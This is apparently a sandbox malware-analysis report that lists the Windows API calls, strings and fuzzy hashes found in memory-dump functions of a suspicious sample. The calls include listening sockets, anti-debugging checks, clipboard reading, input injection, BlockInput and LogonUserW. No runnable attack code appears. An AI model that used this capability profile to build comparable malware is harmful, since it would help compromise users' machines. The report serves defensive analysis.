                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$_strncmp
                                                                                                                    • String ID: @oH$\$^$h
                                                                                                                    • API String ID: 2175499884-3701065813
                                                                                                                    • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                                    • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                                                                    • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                                    • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                                                                    APIs
                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 540024437-0
                                                                                                                    • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                    • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                                                    • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                    • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                                                    • API String ID: 0-2872873767
                                                                                                                    • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                    • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                                                    • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                    • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                                                    APIs
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                                                    • __wsplitpath.LIBCMT ref: 00475644
                                                                                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                    • _wcscat.LIBCMT ref: 00475657
                                                                                                                    • __wcsicoll.LIBCMT ref: 0047567B
                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2547909840-0
                                                                                                                    • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                    • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                                                    • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                    • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                                                    • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                                                    • FindClose.KERNEL32(?), ref: 004525FF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                                                                    • String ID: *.*$\VH
                                                                                                                    • API String ID: 2786137511-2657498754
                                                                                                                    • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                    • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                                                                    • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                    • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                                                                    APIs
                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                    • String ID: pqI
                                                                                                                    • API String ID: 2579439406-2459173057
                                                                                                                    • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                    • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                                                                    • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                    • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                                                                    APIs
                                                                                                                    • __wcsicoll.LIBCMT ref: 00433349
                                                                                                                    • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                                                    • __wcsicoll.LIBCMT ref: 00433375
                                                                                                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsicollmouse_event
                                                                                                                    • String ID: DOWN
                                                                                                                    • API String ID: 1033544147-711622031
                                                                                                                    • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                    • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                                                                    • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                    • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                                                                    • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                                                                    • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                                                                    • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                                                                    • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: KeyboardMessagePostState$InputSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3031425849-0
                                                                                                                    • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                    • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                                                                    • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                    • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4170576061-0
                                                                                                                    • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                    • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                                                    • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                    • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                    • IsWindowVisible.USER32 ref: 0047A368
                                                                                                                    • IsWindowEnabled.USER32 ref: 0047A378
                                                                                                                    • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                                                                    • IsIconic.USER32 ref: 0047A393
                                                                                                                    • IsZoomed.USER32 ref: 0047A3A1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
• Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
• Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
• Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
APIs
  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
• CoInitialize.OLE32(00000000), ref: 00478442
• CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
• CoUninitialize.OLE32 ref: 0047863C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
• Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
• Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
• Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
• Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
APIs
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• GlobalLock.KERNEL32(00000000), ref: 0046DD37
• CloseClipboard.USER32 ref: 0046DD41
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
• CloseClipboard.USER32 ref: 0046DD99
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
• String ID:
• API String ID: 15083398-0
• Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
• Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
• Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
• Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: _memmove
• String ID: U$\
• API String ID: 4104443479-100911408
• Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
• Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
• Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
• Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
APIs
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
• FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
• Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
• Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
• Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
APIs
• GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
• FindFirstFileW.KERNEL32(?,?), ref: 004339D8
• FindClose.KERNEL32(00000000), ref: 004339EB
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
• Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
• Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
• Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
• Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
• InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Internet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 901099227-0
• Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
• Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
• Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
• Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
APIs
• DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Proc
• String ID:
• API String ID: 2346855178-0
• Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
• Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
• Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
• Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
APIs
• BlockInput.USER32(00000001), ref: 0045A38B
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
• Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
• Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
• Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
• Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
APIs
• LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
